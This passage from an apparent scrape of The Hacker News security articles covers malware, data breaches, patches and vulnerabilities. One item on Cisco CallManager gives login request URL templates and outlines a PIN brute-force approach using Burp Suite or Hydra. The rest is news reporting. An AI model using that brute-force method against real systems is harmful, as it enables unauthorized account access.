concerning given that the malware authors could be tricking people into downloading further malware that extends the adversary's reach into the victim's device and data."" AFFECTED SMARTPHONE HANDSETS DeathRing malware pre-loaded on a number of entry-level phones sold by third-tier manufacturers to developing countries and according to the security firm, the handsets affected are: Counterfeit Samsung GS4/Note II A variety of TECNO devices Gionee Gpad G1 Gionee GN708W Gionee GN800 Polytron Rocket S2350 Hi-Tech Amaze Tab Karbonn TA-FONE A34/A37 Jiayu G4S – Galaxy S4 clones, Haier H7 a i9502+ Samsung clone by an unspecified manufacturer However, DeathRing is not the first pre-installed mobile malware spotted by the firm. Earlier this year, LookOut discovered another pre-loaded piece of malware called Mouabad on devices sold by retailers in China, India, and the Philippines. Similar to DeathRing, Mouabad is also somewhere pre-loaded in the supply chain and affected predominantly Asian countries. ",Malware Microsoft Releases 9 Security Updates to Patch 34 Vulnerabilities,https://thehackernews.com/2016/08/windows-patch-updates.html,"In Brief Microsoft's August Patch Tuesday offers nine security bulletins with five rated critical, resolving 34 security vulnerabilities in Internet Explorer (IE), Edge, and Office, as well as some serious high-profile security issues with Windows. A security bulletin, MS16-102, patches a single vulnerability (CVE-2016-3319) that could allow an attacker to control your computer just by getting you to view specially-crafted PDF content in your web browser. Users of Microsoft Edge on Windows 10 systems are at a significant risk for remote code execution (RCE) attacks through a malicious PDF file. Web Page with PDF Can Hack Your Windows Computer Since Edge automatically renders PDF content when the browser is set as a default browser, this vulnerability only affects Windows 10 users with Microsoft Edge set as the default browser, as the exploit would execute by simply by viewing a PDF online. Web browsers for all other affected operating systems do not automatically render PDF content, so an attacker would have to convince users into opening a specially crafted PDF file, typically via an email or instant message, Microsoft said in its advisory. Once exploited, the flaw corrupts memory, allowing a hacker to run malicious code with the same privileges as the user. All the hacker needs is to either lure victims to a website containing a malicious PDF or add an infected PDF file to a website that accepts user-provided content. While this vulnerability has not been publicly disclosed nor seen in any attacked, it is expected to be an attractive attack vector for hackers. Other Critical Bugs can Take Complete Control of Your PC A separate critical update for Edge listed in MS16-096 patches five remote code execution (RCE) flaws and three information disclosure bugs. The company also released its monthly cumulative security update, MS16-095, for Internet Explorer (IE), patching nine vulnerabilities that can be exploited by a malicious web page to pull off remote code execution through memory corruption bug or disclose information about the system. Another critical update includes Microsoft Office Patch MS16-099 that addresses four memory corruption bugs in Office that can be exploited by booby-trapped documents remotely to execute malicious code on a victim's system, taking full control of the victim machines. The update also includes a patch for an information disclosure hole in Microsoft OneNote, which discloses memory contents and information that could be used to compromise a machine. In addition to Windows versions of Office going back to Office 2007, Microsoft is also releasing a patch for Office for Mac 2011 and 2016. The final critical bulletin, MS16-097, patches three Remote Code Execution flaws in the font handling library of Microsoft Graphics Component found in Windows, Office, Skype for Business and Lync that can be exploited by a malicious web page or an Office document. For the second time, the technology giant also released a security update for Secure Boot. Rated important, MS16-100, the update patches a security feature bypass vulnerability that occurs when Secure Boot loads a vulnerable (install a hidden bootkit or rootkit) boot manager. This designing flaw has been fixed in all supported versions of Windows and Windows Server. Other important bulletins address vulnerabilities that lead to man-in-the-middle attacks on Windows and Windows Server, an information disclosure vulnerability in the Universal Outlook component for Windows 10, and four elevation of privilege flaws in kernel-mode drivers for Windows Vista through Windows 10 and Windows Server 2008 and 2012. The company has also issued Cumulative Updates (KB3176493, KB3176495, KB3176492) for Windows 10 users, so those who have upgraded their systems to the Microsoft's new operating system should install the updates as soon as possible. Users are advised to patch their system and software as soon as possible. ",Vulnerability Lessons We Learned From Ashley Madison Data Breach,https://thehackernews.com/2015/07/ashley-madison-hack.html,"Do you use your Real Identity online and think about being private? If yes, then you are insane. Ashley Madison, the popular online dating website with tagline ""Life is short. Have an affair"", recently got hacked, reportedly exposing a sample of its users' account information and other personal data online. The hacker group, called itself 'The Impact Team', is also threatening to release the real names and all associated data of its 37 Million cheating customers. There are also rumors that the team could sell the stolen data for lots of money, instead of revealing it all for free. This isn't first time when the customers of online hooking site are scared of being exposed, two months ago the sex life of almost 4 Million users of Adult Friend Finder was made available on underground market for sale for 70 Bitcoins ($16,800). Lesson we Learned from These Hacks The Ashley Madison hack raises serious questions about what these companies are doing to ensure the security of their users' and employees' personal information. Just go in flashback, OPM (Office of Personnel Management), Sony Pictures Entertainment, Target, Anthem, Home Depot, Neiman Marcus, and many in the list – they all were compromised and lost the very protected users' sensitive data. This indicates nothing is completely secure online. No website can guarantee privacy of your name, credit card number, photo or any other information. One of the company's computer gets hacked, and every secret is out. That is the reality! And you should accept it. One thing these hacks teaches us – Never share your real name and sensitive details online, because your digital footprints are bigger than you think. Many websites don't use encryption, indirectly inviting hackers to get into their systems and expose its users data. Some websites use encryption that are either outdated or easily crackable. If in case any website uses strong encryption to protect their customers data, buggy software such as Adobe Flash and Internet Explorer fills the gap, leaving the doors widely open to hackers. Something similar was happened in the case of Ashley Madison Hack. A privacy flaw on Ashley Madison's Password Reset form allows anyone who knows your email address to easily check whether you had registered an account on the site. Use of the site could also come back to hurt consumers in say, divorce or custody proceedings. ""If you want a presence on sites that you don't want anyone else knowing about, use an email alias not traceable back to yourself or an entirely different account altogether."" Security reseacher Troy Hunt suggested. So, avoid giving your real identity online, because The Internet is not secure and Security is just an Illusion. ",Data_Breaches NIST National Vulnerability Database hacked,https://thehackernews.com/2013/03/nist-national-vulnerability-database.html,"The U.S. government repository of standards based vulnerability management website National Vulnerability Database (NVD) was hacked by some unknown attacker last week. The website of NVD (https://nvd.nist.gov/index.html) is down since Friday due to a malware infection on two web servers, discovered on Wednesday. The main page of website reads,""The NIST National Vulnerability Database (NVD) has experienced an issue with its Web Services and is currently not available. We are working to restore service as quickly as possible. We will provide updates as soon as new information is available."" According to a post available on Google+ by Kim Halavakoski, who contacted NIST Public Inquiries Office to know about the issue,""On Friday March 8, a NIST firewall detected suspicious activity and took steps to block unusual traffic from reaching the Internet. NIST began investigating the cause of the unusual activity and the servers were taken offline. Malware was discovered on two NIST Web servers and was then traced to a software vulnerability."" Currently there is no evidence that NVD or any other NIST public pages contained or were used to deliver malware to users of these NIST Web sites, he added. Team is working as quickly to online the website again as soon as possible. ",Malware "New Internet Explorer zero-day, Can trigger malware automatically",https://thehackernews.com/2012/10/new-internet-explorer-zero-day-can.html,"The new zero day exploit has been discovered and being exploited in the wild. This can be used to load malicious application on victim machines running fully patched Windows XP SP3 along with the latest editions of the IE 7 and IE 8 browser and Adobe's Flash software. Eric Romang was examining one of the servers used to launch attacks on vulnerable Java installations in past, and he says that he has found a new zero day exploit for Microsoft's Internet Explorer web browser. He said, ""I can confirm, the zero-day season is really not over yet."" AlienVault Labs researcher Jaime Blasco reported that, ""the gang behind the Java attacks in August and September may be moving on: with domains used in that attack located at new IP addresses and serving up the new and more potent attacks."" As shown in above image example, the file exploit.html creates the initial vector to exploit the vulnerability and loads the flash file Moh2010.swf, which is a flash file encrypted using DoSWF. The Flash file is in charge of doing the heap spray. Then it loads Protect.html. There results also shows that this zero day attack is being used in attacks that install the Poison Ivy Trojan. Metasploit has released a working exploit for this Zero-day. Subscribe to our Daily Newsletter via email - Be First to know about Security and Hackers. or Join our Huge Hackers Community on Facebook, Google+ and Twitter. ",Vulnerability "Xiaomi Data Breach — ""Exposing Xiaomi"" Talk Pulled from Hacking Conference",https://thehackernews.com/2014/10/xiaomi-data-breach-hacker.html,"China's number one — and the world's 3rd largest — smartphone manufacturer, Xiaomi, which is trying to make inroads into India's booming mobile phone market, was found secretly sending users' personal data, including IMEI numbers, phone numbers and text messages to the web servers back to Beijing in China. INDIA AND TAIWAN vs XIAOMI This issue raised higher concerns across many countries, proactively in India, Singapore and Taiwan. The Indian Air Force (IAF) — among the largest in the world — warned its employees and their belongings that their private information was being shipped over to servers in China, and asked them to avoid using Xiaomi smartphones due to security risk. Taiwanese Government underlined similar concerns before Xiaomi's launch in India. Xiaomi is facing an investigation in Taiwan for alleged cyber security threat, as a result of which last month the Taiwanese government decided to ban the company due to several privacy controversies. When it comes to sales, Xiaomi's Mi3 and RedMi 1S have lately been redefining the term 'Flash Sales' with a recorded sales of 90,000 units in just 12 seconds. So, you can imagine the total Xiaomi statistics of Xiaomi. TAIWANESE RESEARCHER TO EXPOSE XIAOMI AT HACKER CONFERENCE Meanwhile, an independent Taiwanese Security Expert came up with another bad news for Chinese Xiaomi Mobile company, as he claimed to have found zero-day vulnerability in Xiaomi website that allowed him to obtain credentials of millions of Xiaomi accounts and logs from the servers. Taiwanese Researcher allegedly planned to reveal Xiaomi zero-day vulnerability and his investigative researcher at Asia's biggest hackers conference, Ground Zero Summit (G0S) 2014 this November; with his session titled - ""Privacy-Alert: Exposing China-based XIAOMI Mobiles"". As shown in the above screenshot, paper abstract mentioned on the website says, ""In this session Taiwanese Researcher will demonstrate how Xiaomi Phones have been sending device data and personal data of Xiaomi Phone user to Chinese Servers. The Researcher will also release Server Logs, Mi Account username, Emails and passwords of millions of Xiaomi users which have been obtained using a Zero Day flaw in the Xiaomi Servers."" But after getting selected as a speaker for the conference, reportedly the talk has been pulled out from the conference within a day. In a mail, the 'Ground Zero Summit' organizer told The Hacker News that 'Privacy-Alert: Exposing China-based XIAOMI Mobiles' session has been withheld till the time Xiaomi investigates the data breach and accusations made by the researcher. According to the paper, the vulnerability could have been utilized by anyone to convey a data and privacy breach. DATA BREACH AT XIAOMI Xiaomi devices provide 'Mi Account' to its customers through which users gain access to their Mi Cloud, Mi Talk, MIUI Forum, Mi Market and other Xiaomi services. These online Xiaomi Mi Accounts store users' personal information including mobile numbers, email addresses and account credentials. Xiaomi website zero-day vulnerability and Taiwanese Researcher' session at G0S Conference also raises concern about the security of the data of millions of users linked to their Xiaomi's Mi Cloud account. The researcher contacted The Hacker News team and provided partial database of a few thousands of Xiaomi users, which confirmed that the millions of Xiaomi Mi accounts has already been compromised. Anyone with Xiaomi account credential can remotely locate, ring, lock and wipe up your phone data easily. Xiaomi mobile users are recommended to reset ""Mi account"" password immediately. XIAOMI MOVING DATA CENTER TO INDIA After facing several privacy controversies, Xiaomi said today that it plans to open a data center in India, away from its servers in Beijing due to performance and privacy considerations. Just yesterday, Some newly launched Sony Xperia phones were also found secretly sending users' data to Servers in China using Baidu Spyware. UPDATE Here is the email statement issued by Xiaomi on the report: We have verified that the zero-day data breach allegation made by security researcher Chen Huang and the Ground Zero Summit organizing committee is a hoax. The zero-day vulnerability reported by the cyber security researcher, Chen Huang, is a deliberate falsehood, and Xiaomi is taking the necessary legal action against the parties involved. To date, throughout Xiaomi's history, there has only been one incident in which a two-year-old user account file was leaked in May 2014. After conducting a comprehensive investigation, we concluded that file contained information from user accounts registered before August 2012 in an old version of the Xiaomi user forum website. That information became obsolete when, in September 2012, we launched the Xiaomi Account integrated system. In response to the incident in May 2014, we immediately requested users to change their passwords. We also announced the incident publicly via social media and to our user forums on May 14, 2014. Chen Huang has recently threatened to expose data from the old user account file during a session at the upcoming Ground Zero Summit 2014, falsely claiming it to be data compromised through an existing vulnerability. This is a grave accusation, as we take our users' privacy very seriously, and we will seek legal action against the involved parties. ",Data_Breaches What is Threat Intelligence and How It Helps to Identify Security Threats,https://thehackernews.com/2015/11/what-is-cyber-threat-intelligence.html,"Simply put, threat intelligence is knowledge that helps you identify security threats and make informed decisions. Threat intelligence can help you solve the following problems: How do I keep up to date on the overwhelming amount of information on security threats…including bad actors, methods, vulnerabilities, targets, etc.? How do I get more proactive about future security threats? How do I inform my leaders about the dangers and repercussions of specific security threats? Threat Intelligence: What is it? Threat intelligence has received a lot of attention lately. While there are many different definitions, here are a few that get quoted often: Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject's response to that menace or hazard. – Gartner The set of data collected, assessed and applied regarding security threats, threat actors, exploits, malware, vulnerabilities and compromise indicators – SANS Institute Why is everyone talking about it? Verizon's 2015 DBIR estimated a financial loss of $400 million from 700 million compromised records, which resulted from 79,790 security incidents! As long as security threats and breaches occur, every business will look for ways to protect their data. The threat landscape is always changing and the business risk is increasing because of our dependence on IT systems. Threats come from internal as well as external sources. Bottom line is, organizations are under tremendous pressure to manage threats. Though information in the form of raw data is available abundantly, it is hard and time-consuming to get meaningful information based on which proactive measures can be set. This naturally pulls more and more users towards threat intelligence as it helps to prioritize threats within the deluge of data, alerts, and attacks and provides actionable information. The table below presents several common indicators of compromise that can be identified with threat intelligence feeds: Category Indicators of Compromise Examples Network IP addresses URLs Domain names Malware infections targeting internal hosts that are communicating with known bad actors Email Sender's email address and email subject Attachments Links Phishing attempts where internal hosts click on an unsuspecting email and ""phone home"" to a malicious command and control server Host-Based Filenames and file hashes (e.g. MD5) Registry keys Dynamic link libraries (DLLs) Mutex names External attacks from hosts that might be infected themselves or are already known for nefarious activity Threat Intelligence capabilities Attacks can be broadly categorized as user based, application based and infrastructure based threats. Some of the most common threats are SQL injections, DDoS, web application attacks and phishing. It is important to have an IT security solution that provides threat intelligence capabilities to manage these attacks by being both proactive and responsive. Attackers are constantly changing their methods to challenge security systems. Therefore, it becomes inevitable for organizations to get threat intelligence from a variety of sources. One of the proven methods to stay on top of attacks is to detect and respond to threats with a SIEM (Security Information & Event Management system). A SIEM can be used to track everything that happens in your environment and identify anomalous activities. Isolated incidents might look unrelated, but with event correlation and threat intelligence, you can see what is actually happening in your environment. Nowadays, IT security professionals must operate under the assumed breach mentality. Comparing monitored traffic against known bad actors sourced from threat intelligence would help in identifying malicious activities. However, this could be manual and time-consuming. Integrating indicator based threat intelligence to a SEIM security solution would help in identifying compromised system and possibly even prevent some attacks. Best Practices Integrating threat intelligence and responding to attacks is not enough to combat the ever-changing threat landscape. You need to analyze the situation and determine threats you are likely to face, based on which you can come up with precautionary measures. Here is a list of several best practices: Have an application whitelist and blacklist. This helps in preventing execution of malicious or unapproved programs including, .DLL files, scripts and installers. Check your logs carefully to see if an attempted attack was an isolated event, or if the vulnerability had been exploited before. Determine what was changed in the attempted attack. Audit logs and identify why this incident happened – reasons could range from system vulnerability to an out-of-date driver. What will threat intelligence enabled SIEM solve A SIEM, like SolarWinds Log & Event Manager, collects and normalizes log data from monitored traffic and automatically tags suspicious events. With integrated threat intelligence mechanism and built-in rules, the monitored events can be compared against the list of constantly updated known bad actors. You can quickly search & monitor for hits from the bad actors against the log data in real time and identify common indicators of compromise. You can automatically respond with actions like blocking known bad IP addresses, in case of malicious attack attempts. Watch how threat intelligence works in a SIEM and download your free trial of a leading SIEM from SolarWinds. ",Cyber_Attack Former Microsoft Engineer Gets Prison for Role in Reveton Ransomware,https://thehackernews.com/2018/08/microsoft-reveton-ransomware.html,"A former Microsoft network engineer who was charged in April this year has now been sentenced to 18 months in prison after pleading guilty to money laundering in connection with the Reveton ransomware. Reveton malware is old ransomware, also known as scareware or police ransomware that instead of encrypting files locks the screen of victims' computers and displays a message purporting to come from a national law enforcement agency. The splash screen of the malware was designed to falsely tell unsuspecting victims that they have been caught doing illegal or malicious activities online or the law enforcement had found illegal material on their computer, forcing users to make pay a ""fine"" of $200-300 within 48 hours to regain access to their computers. Raymond Odigie Uadiale, 41-year-old, who worked as a Microsoft network engineer, is not the actual author of the Reveton ransomware, but he helped the Reveton distributor, residing in the UK and identified as the online moniker ""K!NG,"" in cashing out ransom money collected from victims in the form of Green Dot MoneyPak prepaid vouchers. Uadiale, who was a student at Florida International University at the time of his crime in 2012 and 2013, was said to have acquired MoneyPak debit cards under the fake name of Mike Roland and received payments from victims of Reveton. Using Liberty Reserve service, Uadiale then transferred $93,640 into accounts of his unnamed co-conspirator in the United Kingdom, after keeping his 30 percent cut. Liberty Reserve was itself closed down by US authorities in May 2013, after its creator pleaded guilty to laundering hundreds of millions of dollars through the digital currency exchange and was sentenced to 20 years in prison. In the Southern Florida US District Court on Monday, Uadiale was given an 18-month prison sentence and three years of supervised release, after he agreed to a plea agreement that dismissed the second count of substantive money laundering. ""The indictment charged Uadiale with one count of conspiracy to commit money laundering and one count of substantive money laundering. As part of the plea agreement, the government dismissed the substantive count."" ""By cashing out and then laundering victim payments, Raymond Uadiale played an essential role in an international criminal operation that victimized unsuspecting Americans by infecting their computers with malicious ransomware,"" said Assistant Attorney General Brian Benczkowski. Microsoft hired Uadiale as a network engineer after the conspiracy charged related to the ransomware scheme in the indictment ended. ",Cyber_Attack Malware Campaign Targeting BlackBerry,https://thehackernews.com/2012/08/malware-campaign-targeting-blackberry.html,"Websense ThreatSeeker Network intercepted a malware campaign targeting BlackBerry customers. These fake emails state that the recipient has successfully created a BlackBerry ID. According to Security Labs, those users who are targeted receive an email with the subject line ""Your BlackBerry ID has been created."" The email encourages users to follow instructions in the attached file on how to ""enjoy the full benefits"" of their ID. The malware comes attached to an email that is an exact copy of the email you receive when creating a new BlackBerry ID. It teases you by asking you to download an attachment that allows you to fully appreciate the BlackBerry user experience. Those who open the attached .zip file will drop a handful of executable files that will modify the system registry to start malware programs upon the machine's next startup. ",Malware "A virus specialized for AutoCAD, a perfect cyber espionage tool",https://thehackernews.com/2012/06/virus-specialized-for-autocad-perfect.html,"A virus specialized for AutoCAD, a perfect cyber espionage tool In recent years we are assisting to a profoundly change in the nature of malware, it is increased the development for spy purposes, for its spread in both private and government sectors. The recent case of Flame malware has demonstrated the efficiency of a malicious agent as a gathering tool in a typical context of state-sponsored attack for cyber espionage. Event like this represent the tip of the iceberg, every day millions of malware instances infect pc in every place in the world causing serious damages related to the leak of sensible information. Specific viruses are developed to address particular sectors and information, that is the case for example of ""ACAD/Medre.A"", a malware specialized in the theft of AutoCAD files. The virus has been developed to steal blueprints from private companies mostly based in Peru according the expert of the security firm ESET. The virus is able to locate AutoCAD file on infected machines and to send them via e-mail to accounts provided by two Chinese internet firms, 163.com and qq.com. The malware detected is written in AutoLISP, an AutoCAD scripting language, ACAD/Medre for the shipment of stolen data creates a password protected RAR-file containing the blueprints and the requisite ""acad.fas"" file and a "".dxf"" file and send it separately by e-mail. The .DXF file generated by ACAD/Medre contains a set of information that the recipient uses to the collecting of stolen files. The password used for the RAR file is just one character equals to ""1"". Once discovered the email accounts used to transfer the stolen data the group of researcher noticed that the InBox for each of them was full, they turned out all saturated by over 100,000 mails giving an idea of the dimension of the attack. The virus has been detected several months ago but only in the last weeks it has been observed an explosion of the number of infected systems. The researcher Righard Zwienenberg researcher of ESET declared ""It represents a serious case of industrial espionage,"" ""Every new design is sent automatically to the operator of this malware. Needless to say this can cost the legitimate owner of the intellectual property a lot of money as the cybercriminals have access to the designs even before they go into production."" ""They may even have the guts to apply for patents on the product before the inventor has registered it at the patent office."" The malware not limits its action to steal Autocad projects, it also checks the presence of Outlook email client to steal the pst file containing contacts, calendar and emails, confirming its genesis of espionage tool. For completeness of information ESET provided a free stand-alone cleaner available for the ACAD/Medre.A worm. Every time we speak about of cyber espionage we could not think other that China, however the practice is really diffused and the fact that the accounts are related to Chinese accounts is clue but not a certainty. It's clear that Chinese hackers are considered worldwide specialist in cyber espionage, the case of Nortel is considered a case study for the impact of cyber espionage on the business of private companies. The Chinese government, and not only, at least a decade sponsored espionage activities for stealing trade secrets, confidential information and intellectual property of various kinds. Many experts are convinced that thanks to their ability to spy they were able, through the theft and reverse engineering of products, to clear the technological gap with the western industry. This time the Chinese authorities have demonstrated a collaborative approach identifying and blocking the accounts used for theft. Tens of thousands of AutoCAD blueprints leaked, the team of ESET experts promptly contacted the Chinese authorities such us Tencent company, owners of the qq.com domain, and also the Chinese National Computer Virus Emergency Response Center, their collaboration was essential to access to the account blocking them. Another lesson learnt is an efficient fight to the cybercrime must be conducted with a total collaboration of all the involved actors. Only in this way it's possible to conduct an efficient immunization . Written By: Pierluigi Paganini References [Source] ",Malware BlackBerry Z10 Privilege Escalation Vulnerability,https://thehackernews.com/2013/06/blackberry-z10-privilege-escalation.html,"BlackBerry Z10 users should be aware that there is a privilege escalation vulnerability. The vulnerability potentially allows a hacker to modify or edit data on a stolen BlackBerry Z10 smartphone with BlackBerry Protect enabled, identified as BSRT-2013-006 (CVE-2013-3692) According to the advisory, an escalation of privilege vulnerability exists in the software 'BlackBerry® Protect™' of Z10 phones, supposed to help users delete sensitive files on a lost or stolen smartphone, or recover it again if it is lost. ""Taking advantage of the weak permissions could allow the malicious app to gain the device password if a remote password reset command had been issued through the BlackBerry Protect website, intercept and prevent the smartphone from acting on BlackBerry Protect commands, such as a remote smartphone wipe."" The company says that version 10.0.9.2743 is not affected and that they have found no evidence of attackers exploiting this vulnerability in the wild. Furthermore, the more severe exploitation requires that an attacker has physical access to the device after its user has downloaded a maliciously crafted application. As for the second advisory, Adobe Flash Player versions earlier than 10.0.10.648 included with Z10 are affected while versions 2.1.0.1526 on the PlayBook are impacted, identified as CVE-2013-0630. To exploit this, the user must interact with a malicious .swf application embedded in website content or via an email attachment over webmail through a browser on one of the devices. To avoid this vulnerability, you should update to the latest Blackberry 10 OS version. ",Vulnerability Adobe Flash Player Update Patches 11 Critical Vulnerabilities,https://thehackernews.com/2015/03/adobe-flash-player-update.html,"After the latest Microsoft Patch Tuesday updates that came with important patches for Stuxnet and FREAK encryption-downgrade attack, now its time to update your Adobe Flash Player. Adobe has rolled-out an update for its popular Flash Player software that patches a set of 11 critical security vulnerabilities in its program, most of which potentially allow hackers to remotely execute arbitrary code on vulnerable systems. AFFECTED SOFTWARE All versions prior to the latest version 17.0.0.134 of the Flash Player are affected on Windows and Mac OS X machines. Therefore, Adobe Flash Player installed with Google Chrome, as well as Internet Explorer 10 and 11 on Windows 8 and Windows 8.1, should automatically update to the newest version 17.0.0.134. In addition, Adobe Flash Player 11.2.202.442 for Linux and Flash Player Extended Support Release 13.0.0.269 for Windows and Mac OS X are also affected by the vulnerabilities. So, users of Flash Player on Linux should update to version 11.2.202.451 and Flash Player Extended Support Release on Windows and Mac are recommended to update to version 13.0.0.277. REMOTE CODE EXECUTION Total 9 Remote Code Execution vulnerabilities patches are included in the latest Adobe Flash PLayer update. An attacker could serve a specially crafted Flash file to trigger the vulnerabilities, which would lead to the execution of attacker's code in order to take control of a target system. Most of the vulnerabilities in Adobe Flash Player have been reported by security researchers from Google's Project Zero team. Other security companies that disclosed the vulnerabilities are Hewlett-Packard, NCC Group, Intel and McAfee. LIST OF VULNERABILITIES The list of all the patched vulnerabilities along with their impacts is given below: CVE-2014-0332 — Remote code execution via memory corruption vulnerability. CVE-2015-0333 — Remote code execution via memory corruption vulnerability. CVE-2015-0334 — Remote code execution from type confusion vulnerability. CVE-2015-0335 — Remote code execution via memory corruption vulnerability. CVE-2015-0336 — Remote code execution from type confusion vulnerability. CVE-2015-0337 — A 'cross domain policy bypass' flaw. CVE-2015-0338 — Remote code execution from integer overflow vulnerability. CVE-2015-0339 — Remote code execution via memory corruption vulnerability. CVE-2015-0340 — A 'File upload restriction bypass' flaw. CVE-2015-0341 — Remote code execution from a 'use-after-free' vulnerability. CVE-2015-0342 — Remote code execution from a 'use-after-free' vulnerability. According to Adobe, none of the vulnerabilities are being publicly exploited in the wild thus far. However, we all know that immediately after the the release of updated versions, hackers starts exploiting these critical flaws in order to catch out people who haven't updated their machines. Therefore users and administrators running Adobe Flash Player on Windows, Mac OS X and Linux are advised to update their software to the most recent version of the software in an attempt to protect their systems from cyber attacks. ",Vulnerability Possible Data Breach at Arts and Crafts Retailer 'Michaels Store',https://thehackernews.com/2014/01/possible-data-breach-at-arts-and-crafts.html,"Western landscapes are facing a hell lot of data breaches started with Target, Neiman Marcus and now country's largest crafts chain 'Michael's Art and Crafts' may be is the latest retailer hit by a security breach. In a statement, Irving, Texas-based company acknowledged a possible data security breach that may have affected its customers' payment card information at its 1250 stores across the United States and Canada. They also announced that it is working closely with federal law enforcement and is conducting an investigation with the help of third-party data security experts to establish the facts. ""Michaels said in its statement that it had ""recently learned of possible fraudulent activity on some US payment cards that had been used at Michaels, suggesting that the company may have experienced a data security attack"" company said. CEO Chuck Rubin said that the company has not confirmed a breach, but wanted to alert customers: We are concerned there may have been a data security attack on Michaels that may have affected our customers' payment card information and we are taking aggressive action to determine the nature and scope of the issue. Michaels gave no additional information on the possible breach. At the time of writing, it was not known that how many customers may be involved and the possible breach affected online or in-store shoppers. Michaels, a 37 year old chain with 1259 stores had revenue more than $4 Billion in 2012, and this is not the first time when the company has faced a data breach. In 2011, about 94,000 payment card numbers were stolen from approx 80 stores. Michaels is the third major targeted retailer in the past month. In December, the attack on Target affected as many as 110 million customers, including 40 million credit and debit card and Neiman Marcus said a 3 month breach in the summer affected its 1.1 million customers. The FBI has sent a three-page confidential memo to retailers and warned them to get prepared for more attacks involving ""memory-parsing"" malware that lives on point of sale registers (POS), which includes card-swiping machines and cash registers. This memory-parsing malware is also referred to as a RAM scraper. The FBI mentions one particular variant of this malware, apparently called Alina, available at $6000 on underground forums. If Michaels confirms a breach, it would become the latest victim in a string of data attacks rattling merchants across the U.S. Meanwhile, clients have been recommended to check their payment card account statements for unauthorized charges. ",Malware Hostinger Suffers Data Breach – Resets Password For 14 Million Users,https://thehackernews.com/2019/08/web-hosting-hostinger-breach.html,"Popular web hosting provider Hostinger has been hit by a massive data breach, as a result of which the company has reset passwords for all customers as a precautionary measure. In a blog post published on Sunday, Hostinger revealed that ""an unauthorized third party"" breached one of its servers and gained access to ""hashed passwords and other non-financial data"" associated with its millions of customers. The incident occurred on August 23 when unknown hackers found an authorization token on one of the company's servers and used it to gain access to an internal system API, without requiring any username and password. Immediately after the breach discovery, Hostinger restricted the vulnerable system, making this access no longer available, and contacted the respective authorities. ""On August 23rd, 2019 we have received informational alerts that one of our servers has been accessed by an unauthorized third party,"" Hostinger said. ""This server contained an authorization token, which was used to obtain further access and escalate privileges to our system RESTful API Server*. This API Server* is used to query the details about our clients and their accounts."" The API database hosts personal information of nearly 14 million Hostinger customers, including their usernames, emails, hashed passwords, first names, and IP addresses, which have been accessed by hackers. Breach Affects Over Half of Hostinger's User Base The company has over 29 million users, so the data breach affected over half of its complete user base. However, it should be noted that the company used the weak SHA-1 hashing algorithm to scramble the Hostinger client passwords, making it easier for hackers to crack the passwords. As a precautionary measure, the company has reset all Hostinger Client login passwords using the stronger SHA-2 algorithm and sent out emails password recovery emails to the affected consumers. Also, the company doesn't currently offer two-factor authentication (2FA) for its customers' accounts, though it says it is planning to provide this additional layer of security in the near future. Hostinger reassured its customers that no financial data is believed to have been accessed as the company never stores any payment card or other sensitive financial data on its servers, adding that third-party payment providers handle payments for its services. Furthermore, the company has also assured that a thorough internal investigation found that the Hostinger Client accounts and data stored on those accounts, including websites, domains, and hosted emails, remained untouched and unaffected. The investigation into the matter is still ongoing, and a team of internal and external forensics experts and data scientists has been assembled to discover the origin of the data breach and increase security measures of all the company's operations. Following the password reset, the company is also urging its customers to set a strong and unique password for their Hostinger accounts and to be cautious of suspicious emails asking them to click on the links or download attachments, as well as any unsolicited communications asking for login details, or other personal information. Customers who want to delete their details from Hostinger servers under GDPR rules should contact gdpr@hostinger.com. ",Data_Breaches Cisco CallManager vulnerable to brute force attack,https://thehackernews.com/2012/10/cisco-callmanager-vulnerable-to-brute.html,"Roberto Suggi Liverani, founder of the OWASP (Open Web Application Security Project) New Zealand chapter discover a vulnerability in Cisco CallManager AKA Unified Communications Manager. It is a software-based call-processing system developed by Cisco Systems. He described on his blog ""During a security review, I have found a quick way to perform PIN brute force attack against accounts registered with a Cisco Unified Communications Manager (CallManager)."" Researcher target the HTTP GET requests used by CallManager to initiate the login process. : https://x.x.x.x/ccmpd/pdCheckLogin.do?name=undefined He Demonstrated the idea with Burp Suite (Penetration testing Framework). He showed the html form parameter used for login as shown below: https://x.x.x.x/ccmpd/login.do?sid=_sid_value_&userid=_userid_&pin=_PIN_ The sid token is required to perform the PIN brute force attack. So first get a valid sid token value and then you can brute force userid and pin using dictionary attack or Combination attack. Others can use HYDRA(most powerful bruteforce tool) , which is capable of brute forcing HTTP web requests. ",Vulnerability Ransomware Virus Shuts Down Electric and Water Utility,https://thehackernews.com/2016/04/power-ransomware-attack.html,"Ransomware has become an albatross around the neck, targeting businesses, hospitals, and personal computers worldwide and extorting Millions of Dollars. Typical Ransomware targets victim's computer encrypts files on it, and then demands a ransom -- typically about $500 in Bitcoin -- in exchange for a key that will decrypt the files. Guess what could be the next target of ransomware malware? Everything that is connected to the Internet. There is a huge range of potential targets, from the pacemaker to cars to Internet of the Things, that may provide an opportunity for cybercriminals to launch ransomware attacks. Recently, the American public utility Lansing Board of Water & Light (BWL) has announced that the company has become a victim of Ransomware attack that knocked the utility's internal computer systems offline. Also Read: FBI Suggests Ransomware Victims — 'Just Pay the Ransom'. The attack took place earlier this week when one of the company's employees opened a malicious email attachment. Once clicked, the malware installed on the computer and quickly began encrypting the organization's files, according to the Lansing State Journal. BWL quickly decided to shut down its networks and suspend some services, including accounting and email service for its about 250 employees, in order to prevent further damages. Power and water shut-offs by BWL was also suspended. Though the ransomware type is still unknown, the utility is currently working with the Federal Bureau of Investigation (FBI) and local law enforcement authorities to investigate the incident. The company assured its 96,000 customers that no personal information related to its customers or employees has been compromised by the ransomware intrusion into the corporate computer network. However, it is not yet clear whether the utility paid the Ransom in exchange of its data. The company said law enforcement has limited it from discussing the issue in public, at least for now. ",Malware Another Malware from Android Market infect Millions of Users,https://thehackernews.com/2012/01/another-malware-from-android-market.html,"Another Malware from Android Market infect Millions of Users Malware might have infected more than 5 million Android mobile devices via deliberately corrupted apps sold in the Android Marketplace, according to security firm Symantec. They reckoned Android.Counterclank, a slight variant of Android.Tonclank. Symantec explains that the malicious code appears in a package called ""apperhand"", and a service under the same name can been seen running on the infected device when it's executed. According to Symantec, the Trojan has been identified in 13 different apps in the Android Marketplace. Symantec's Security Response Team Director, Kevin Haley said:""They don't appear to be real publishers. There aren't rebundled apps, as we've seen so many times before."" Symantec also noted that this slimy piece of malware has the highest distribution of any malware identified so far this year and may actually be the largest malware infection seen by Android users in the operating systems short life. The malware is actually a 